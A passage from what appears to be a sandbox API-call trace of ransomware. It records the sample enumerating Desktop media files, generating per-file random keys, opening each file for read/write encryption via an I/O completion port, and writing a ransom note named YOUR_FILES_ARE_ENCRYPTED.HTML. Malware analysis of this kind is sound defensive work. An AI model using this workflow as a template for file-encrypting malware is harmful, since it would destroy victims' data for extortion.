param_1=0x19ed06, param_2="%02X" | out: param_1="47") returned 2 [0123.920] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="B2") returned 2 [0123.920] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="F5") returned 2 [0123.920] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="DC") returned 2 [0123.920] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="DB") returned 2 [0123.920] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="7D") returned 2 [0123.920] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="C7") returned 2 [0123.920] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="A8") returned 2 [0123.920] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="30") returned 2 [0123.920] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="F0") returned 2 [0123.920] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="C0") returned 2 [0123.920] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="8D") returned 2 [0123.920] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="4D") returned 2 [0123.920] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="21") returned 2 [0123.920] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="CC") returned 2 [0123.920] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="E3") returned 2 [0123.920] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="98") returned 2 [0123.920] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="2D") returned 2 [0123.920] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="E3") returned 2 [0123.921] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="EE") returned 2 [0123.921] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="07") returned 2 [0123.921] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="52") returned 2 [0123.921] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="01") returned 2 [0123.921] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="0B") returned 2 [0123.921] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="90") returned 2 [0123.921] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="4B") returned 2 [0123.921] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="A8") returned 2 [0123.921] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="C1") returned 2 [0123.921] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="5A") returned 2 [0123.921] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\XKIyMoB.gif" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\XKIyMoB.gif") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\XKIyMoB.gif" [0123.921] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.921] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0123.948] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13e6d960, ftCreationTime.dwHighDateTime=0x1d70480, ftLastAccessTime.dwLowDateTime=0x104390a0, ftLastAccessTime.dwHighDateTime=0x1d708c2, ftLastWriteTime.dwLowDateTime=0x104390a0, ftLastWriteTime.dwHighDateTime=0x1d708c2, nFileSizeHigh=0x0, nFileSizeLow=0x17ef3, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="xW7T.wav", cAlternateFileName="")) returned 1 [0123.948] StrStrIW (lpFirst="xW7T.wav", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.948] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\xW7T.wav") returned 42 [0123.948] PathFindExtensionW (pszPath="xW7T.wav") returned=".wav" [0123.948] lstrlenW (lpString=".wav") returned 4 [0123.948] PathFindExtensionW (pszPath="xW7T.wav") returned=".wav" [0123.948] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0123.949] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\xW7T.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xw7t.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0123.949] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=98035) returned 1 [0123.950] GetProcessHeap () returned 0x600000 [0123.950] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0123.952] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="D5") returned 2 [0123.952] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="B3") returned 2 [0123.952] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="B0") returned 2 [0123.952] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="51") returned 2 [0123.952] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="E5") returned 2 [0123.952] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="4F") returned 2 [0123.952] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="F6") returned 2 [0123.952] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="2C") returned 2 [0123.952] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="34") returned 2 [0123.952] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="40") returned 2 [0123.952] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="8F") returned 2 [0123.952] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="95") returned 2 [0123.952] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="F4") returned 2 [0123.953] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="49") returned 2 [0123.953] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="46") returned 2 [0123.953] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="44") returned 2 [0123.953] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="A7") returned 2 [0123.953] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="FB") returned 2 [0123.953] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="9A") returned 2 [0123.953] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="77") returned 2 [0123.953] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="D1") returned 2 [0123.953] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="C4") returned 2 [0123.953] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="20") returned 2 [0123.953] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="4B") returned 2 [0123.953] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="18") returned 2 [0123.953] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="A2") returned 2 [0123.953] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="8B") returned 2 [0123.953] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="A9") returned 2 [0123.953] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="08") returned 2 [0123.953] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="2E") returned 2 [0123.953] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="3E") returned 2 [0123.953] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="69") returned 2 [0123.953] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\xW7T.wav" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\xW7T.wav") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\xW7T.wav" [0123.954] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.954] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0123.958] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f041aa0, ftCreationTime.dwHighDateTime=0x1d702c7, ftLastAccessTime.dwLowDateTime=0x20b6e6d0, ftLastAccessTime.dwHighDateTime=0x1d709e4, ftLastWriteTime.dwLowDateTime=0x20b6e6d0, ftLastWriteTime.dwHighDateTime=0x1d709e4, nFileSizeHigh=0x0, nFileSizeLow=0x9188, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="xXIl9ykNFdP1.jpg", cAlternateFileName="XXIL9Y~1.JPG")) returned 1 [0123.958] StrStrIW (lpFirst="xXIl9ykNFdP1.jpg", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.958] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\xXIl9ykNFdP1.jpg") returned 50 [0123.958] PathFindExtensionW (pszPath="xXIl9ykNFdP1.jpg") returned=".jpg" [0123.958] lstrlenW (lpString=".jpg") returned 4 [0123.958] PathFindExtensionW (pszPath="xXIl9ykNFdP1.jpg") returned=".jpg" [0123.958] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0123.958] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\xXIl9ykNFdP1.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\xxil9yknfdp1.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0123.959] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=37256) returned 1 [0123.959] GetProcessHeap () returned 0x600000 [0123.959] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0123.960] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="52") returned 2 [0123.960] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="2F") returned 2 [0123.960] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="9A") returned 2 [0123.960] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="32") returned 2 [0123.960] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="87") returned 2 [0123.960] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="8F") returned 2 [0123.960] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="0C") returned 2 [0123.960] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="24") returned 2 [0123.960] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="9E") returned 2 [0123.960] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="4B") returned 2 [0123.960] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="78") returned 2 [0123.960] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="8B") returned 2 [0123.960] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="ED") returned 2 [0123.960] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="B9") returned 2 [0123.960] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="4D") returned 2 [0123.960] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="B0") returned 2 [0123.960] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="07") returned 2 [0123.961] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="57") returned 2 [0123.961] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="F8") returned 2 [0123.961] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="62") returned 2 [0123.961] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="50") returned 2 [0123.961] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="61") returned 2 [0123.961] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="47") returned 2 [0123.961] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="17") returned 2 [0123.961] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="9C") returned 2 [0123.961] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="16") returned 2 [0123.961] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="C5") returned 2 [0123.961] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="E5") returned 2 [0123.961] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="78") returned 2 [0123.961] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="F2") returned 2 [0123.961] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="E4") returned 2 [0123.961] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="7A") returned 2 [0123.961] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\xXIl9ykNFdP1.jpg" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\xXIl9ykNFdP1.jpg") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\xXIl9ykNFdP1.jpg" [0123.961] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.961] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0123.967] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc844c50, ftCreationTime.dwHighDateTime=0x1d6fd7d, ftLastAccessTime.dwLowDateTime=0xb351bd50, ftLastAccessTime.dwHighDateTime=0x1d6ff0b, ftLastWriteTime.dwLowDateTime=0xb351bd50, ftLastWriteTime.dwHighDateTime=0x1d6ff0b, nFileSizeHigh=0x0, nFileSizeLow=0xb442, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="YHlJdGdc7IqFgiX.wav", cAlternateFileName="YHLJDG~1.WAV")) returned 1 [0123.967] StrStrIW (lpFirst="YHlJdGdc7IqFgiX.wav", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.967] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\YHlJdGdc7IqFgiX.wav") returned 53 [0123.967] PathFindExtensionW (pszPath="YHlJdGdc7IqFgiX.wav") returned=".wav" [0123.967] lstrlenW (lpString=".wav") returned 4 [0123.967] PathFindExtensionW (pszPath="YHlJdGdc7IqFgiX.wav") returned=".wav" [0123.967] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0123.967] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\YHlJdGdc7IqFgiX.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yhljdgdc7iqfgix.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0123.968] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=46146) returned 1 [0123.968] GetProcessHeap () returned 0x600000 [0123.968] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0123.971] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="59") returned 2 [0123.972] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="0D") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="07") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="13") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="2F") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="5C") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="78") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="5C") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="8D") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="DD") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="82") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="28") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="27") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="C9") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="6F") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="C5") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="9A") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="28") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="F9") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="93") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="73") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="7E") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="B5") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="B8") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="24") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="B8") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="36") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="C6") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="FC") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="9C") returned 2 [0123.972] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="3F") returned 2 [0123.973] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="64") returned 2 [0123.973] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\YHlJdGdc7IqFgiX.wav" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\YHlJdGdc7IqFgiX.wav") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\YHlJdGdc7IqFgiX.wav" [0123.973] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.973] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0123.978] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb4b6b0, ftCreationTime.dwHighDateTime=0x1d704a7, ftLastAccessTime.dwLowDateTime=0x20852f30, ftLastAccessTime.dwHighDateTime=0x1d70a36, ftLastWriteTime.dwLowDateTime=0x20852f30, ftLastWriteTime.dwHighDateTime=0x1d70a36, nFileSizeHigh=0x0, nFileSizeLow=0x12097, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="z0 VrZj.avi", cAlternateFileName="Z0VRZJ~1.AVI")) returned 1 [0123.978] StrStrIW (lpFirst="z0 VrZj.avi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.978] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\z0 VrZj.avi") returned 45 [0123.978] PathFindExtensionW (pszPath="z0 VrZj.avi") returned=".avi" [0123.978] lstrlenW (lpString=".avi") returned 4 [0123.978] PathFindExtensionW (pszPath="z0 VrZj.avi") returned=".avi" [0123.978] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0123.978] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\z0 VrZj.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\z0 vrzj.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0123.980] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=73879) returned 1 [0123.980] GetProcessHeap () returned 0x600000 [0123.980] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0123.981] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="0C") returned 2 [0123.981] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="CE") returned 2 [0123.981] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="D7") returned 2 [0123.981] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="6B") returned 2 [0123.981] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="C2") returned 2 [0123.981] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="34") returned 2 [0123.981] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="6E") returned 2 [0123.981] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="A3") returned 2 [0123.981] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="11") returned 2 [0123.981] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="7C") returned 2 [0123.981] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="2B") returned 2 [0123.981] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="8D") returned 2 [0123.981] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="CE") returned 2 [0123.981] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="8B") returned 2 [0123.981] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="CA") returned 2 [0123.981] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="D6") returned 2 [0123.981] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="E0") returned 2 [0123.981] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="77") returned 2 [0123.981] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="5D") returned 2 [0123.981] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="3C") returned 2 [0123.981] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="85") returned 2 [0123.981] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="9E") returned 2 [0123.981] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="F1") returned 2 [0123.981] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="3F") returned 2 [0123.981] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="0D") returned 2 [0123.982] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="0A") returned 2 [0123.982] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="01") returned 2 [0123.982] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="49") returned 2 [0123.982] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="C8") returned 2 [0123.982] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="90") returned 2 [0123.982] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="4D") returned 2 [0123.982] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="4F") returned 2 [0123.982] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\z0 VrZj.avi" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\z0 VrZj.avi") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\z0 VrZj.avi" [0123.982] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.982] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0123.986] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb4b6b0, ftCreationTime.dwHighDateTime=0x1d704a7, ftLastAccessTime.dwLowDateTime=0x20852f30, ftLastAccessTime.dwHighDateTime=0x1d70a36, ftLastWriteTime.dwLowDateTime=0x20852f30, ftLastWriteTime.dwHighDateTime=0x1d70a36, nFileSizeHigh=0x0, nFileSizeLow=0x12097, dwReserved0=0x6265ec, dwReserved1=0x6265b8, cFileName="z0 VrZj.avi", cAlternateFileName="Z0VRZJ~1.AVI")) returned 0 [0123.986] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0123.986] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 63 [0123.986] GetProcessHeap () returned 0x600000 [0123.986] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x336a170 [0123.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0123.994] WriteFile (in: hFile=0x314, lpBuffer=0x336a170*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x336a170*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0123.995] CloseHandle (hObject=0x314) returned 1 [0123.996] GetProcessHeap () returned 0x600000 [0123.996] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336a170 | out: hHeap=0x600000) returned 1 [0123.996] GetProcessHeap () returned 0x600000 [0123.996] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0123.998] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x52e9524b, 